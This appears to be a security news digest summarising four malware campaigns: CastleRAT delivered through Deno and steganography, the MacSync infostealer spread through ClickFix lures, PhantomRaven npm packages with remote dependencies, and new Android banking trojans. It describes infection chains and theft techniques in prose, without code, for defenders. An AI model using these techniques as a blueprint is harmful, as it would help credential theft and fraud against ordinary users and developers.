Trending Topics

CastleRAT Campaign Abuses Deno Runtime and Steganography to Deliver Fileless Malware

Researchers at ThreatDown identified a malware campaign that delivers CastleRAT, a remote access trojan designed for espionage, surveillance, and credential theft, by abusing the legitimate Deno JavaScript runtime. The attack begins with a social engineering technique known as ClickFix, which directs victims to a compromised webpage that displays a fake browser error or a CAPTCHA verification prompt. The page instructs users to copy and paste a command into the Windows Run dialog or terminal, which silently downloads a malicious installer and initiates the infection chain. Instead of immediately deploying malware, the script installs the legitimate Deno runtime, allowing attackers to execute obfuscated JavaScript within a trusted process and bypass many traditional security controls. Researchers note this is the first documented case of threat actors weaponizing the Deno runtime within a malware delivery framework. The next stage introduces a stealthy technique that leverages steganography and in-memory execution. The Deno process downloads a portable Python environment disguised as a legitimate component, along with a seemingly harmless JPEG image that actually contains the encrypted CastleRAT payload. A heavily obfuscated Python script extracts the hidden code from the image and loads it directly into memory via reflective PE loading, allowing the malware to run without writing an executable to disk. Once active, CastleRAT collects host information and communicates with command-and-control infrastructure while enabling keylogging, clipboard monitoring, browser credential theft, and cryptocurrency wallet harvesting. The malware can also activate webcams and microphones for surveillance, steal session tokens from applications such as Telegram and Discord, and provide attackers with a remote shell for full system control. Persistence is maintained through scheduled tasks that relaunch the loader after system reboot, ensuring continued access while remaining largely invisible to traditional antivirus tools. Organizations should implement behavior-based endpoint detection capable of identifying abnormal use of legitimate runtimes, such as Deno; monitoring suspicious command execution triggered by user prompts; and detecting in-memory injection activity and unusual process chains associated with reflective PE loading.

ClickFix Campaigns Target macOS Users With Evolving MacSync Infostealer

Researchers from Sophos X-Ops identified multiple campaigns leveraging the ClickFix social-engineering technique to deliver the MacSync infostealer to macOS users. Early campaigns observed in November 2025 used Google malvertising tied to search terms such as “ChatGPT Atlas,” redirecting victims to fake OpenAI-branded sites hosted on Google infrastructure. These pages instructed users to paste obfuscated commands into Terminal, which downloaded Bash scripts that requested the victim’s macOS password and deployed the MacSync stealer. A later campaign in December 2025 evolved the lure strategy by linking sponsored search results to shared ChatGPT conversations containing instructions for optimizing macOS systems. These conversations redirected victims to GitHub-themed landing pages that simulated legitimate software installation processes. Embedded tracking infrastructure collected victim telemetry through a hidden stats[.]php endpoint that recorded IP addresses, geolocation data, and interaction metrics, sending real-time notifications to attacker-controlled Telegram bots. Campaign telemetry revealed thousands of user interactions within days, indicating significant reach, even if not all interactions resulted in successful infection. By early 2026, researchers observed a significantly more advanced version of MacSync that shifted from standalone Mach-O binaries to a multi-stage loader-as-a-service architecture designed for stealth and persistence. After users execute the malicious Terminal command, an obfuscated shell script is retrieved that runs silently in the background, authenticates to the command-and-control infrastructure using API keys and unique victim tokens, and dynamically retrieves AppleScript payloads to be executed in memory via osascript. These payloads perform extensive data harvesting from the compromised system, including browser credentials, cookies, and autofill data from Chromium and Firefox browsers, macOS Keychain databases, SSH keys, cloud credentials such as AWS and Kubernetes configurations, and files from common user directories containing sensitive information. The malware also targets cryptocurrency wallets and attempts to tamper with Ledger Live installations by injecting malicious code that can exfiltrate seed phrases. Stolen data is packaged into compressed archives and exfiltrated in segmented uploads to attacker infrastructure, while the loader relaunches itself as a background daemon to maintain persistence and evade detection. Organizations should restrict execution of unsigned scripts and terminal commands from untrusted sources, monitor for suspicious osascript and curl activity originating from user shells, and deploy behavior-based endpoint detection capable of identifying macOS infostealers and anomalous command execution chains.

PhantomRaven Expands Through New npm Waves Using Remote Dynamic Dependencies

EndorLabs has identified three new PhantomRaven waves spanning 88 malicious npm packages published between November 2025 and February 2026, showing that the campaign remains active well beyond its original 2025 disclosure. The attack relies on Remote Dynamic Dependencies (RDD), a technique where the npm package itself appears largely benign, but its package[.]json points npm to fetch a second-stage dependency from an attacker-controlled external URL during installation. That design lets the malicious code evade many standard package scans because the harmful logic is not embedded directly in the npm-hosted package. Across these new waves, the actor used over 50 disposable npm accounts, rotated domains and metadata, and increasingly relied on slopsquatted package names that mimicked plausible Babel, GraphQL Codegen, ESLint, and import/export utility packages a developer might mistakenly trust. Once installed, the PhantomRaven payload automatically executes through a pre-install hook and steals a targeted set of developer and CI/CD data. The malware harvests email addresses from [.]gitconfig, [.]npmrc, environment variables, and local package[.]json metadata, then collects build pipeline secrets and environment context from platforms such as GitHub Actions, GitLab CI, Jenkins, and CircleCI. It also fingerprints the infected host by gathering the public IP, hostname, operating system, and node version, then exfiltrates that data through a triple-redundant chain of HTTP GET, HTTP POST, and fallback WebSocket communications. Researchers found the payload remained almost unchanged across all four observed PhantomRaven waves, with 257 of 259 lines of code identical, while only the C2 domain and exfiltration endpoint names changed. The infrastructure also showed clear continuity, with all domains using Amazon Registrar, AWS Route53, WHOIS privacy, AWS EC2 hosting, and no TLS certificates, reinforcing the attribution to a single operator who is iterating the same playbook. The key lesson is that PhantomRaven does not depend on advanced malware engineering so much as it exploits trust in npm’s dependency resolution process, allowing benign-looking packages to silently pull malicious code from outside the registry at install time. Organizations should block or strictly review npm packages that use URL-based dependencies outside the official registry, enforce package allowlisting and publisher verification, and monitor build environments for unexpected preinstall execution and outbound dependency fetches to non-registry domains.

New Android Banking Trojans Expand from PIX Hijacking to Full Device Takeover

Researchers at Zimperium have identified six new Android malware families that blend banking fraud, credential theft, and remote device control. The set includes PixRevolution, BeatBanker, TaxiSpy RAT, Mirax, Oblivion RAT, and SURXRAT, with activity spanning Brazil, Russia, and broader criminal MaaS ecosystems. PixRevolution is especially notable because it targets Brazil’s PIX instant payment system using an agent-in-the-loop model, in which a human or possibly AI-assisted operator monitors the victim’s device in real time and intervenes at the exact moment a transfer is initiated. Instead of merely stealing credentials, the malware abuses Accessibility Services and MediaProjection to monitor the screen, present a fake “Aguarde…” overlay, replace the intended PIX key with an attacker-controlled one, and confirm the transaction before the victim notices. BeatBanker follows a similar financial-fraud path but adds unusual persistence through a looping low-volume audio file, integrates a Monero miner, and can swap cryptocurrency destination addresses during USDT transactions on Binance and Trust Wallet. TaxiSpy RAT combines traditional mobile banking-trojan behavior with broader RAT capabilities, including SMS theft, contact and call-log collection, screen monitoring, notification theft, and overlays against Russian banking, government, and crypto apps, while Mirax, Oblivion, and SURXRAT show that these capabilities are now increasingly packaged as commercial malware-as-a-service offerings. What ties these families together is their consistent abuse of Android accessibility permissions, remote-control features, and modular payload delivery to turn a compromised phone into a live fraud terminal rather than just a credential-stealing endpoint. PixRevolution spreads through fake Google Play pages impersonating trusted brands like Expedia, Correios, Sicredi, and even Brazilian government-themed apps, then uses polished onboarding screens to trick users into enabling an accessibility service labeled “Revolution,” after which it monitors transaction-related keywords and streams the victim’s screen to a C2 server over TCP. BeatBanker reportedly uses Firebase Cloud Messaging for C2 and has recently been observed dropping BTMOB RAT, while TaxiSpy uses Firebase push messaging, native-library encryption, rolling XOR obfuscation, and WebSocket-based real-time control to evade detection. SURXRAT extends this trend further by offering persistent accessibility-based control, Firebase-backed infrastructure, ransomware-style screen locking, and even limited LLM-related experimentation, suggesting that mobile RAT operators are actively testing AI-assisted features alongside conventional surveillance and fraud modules.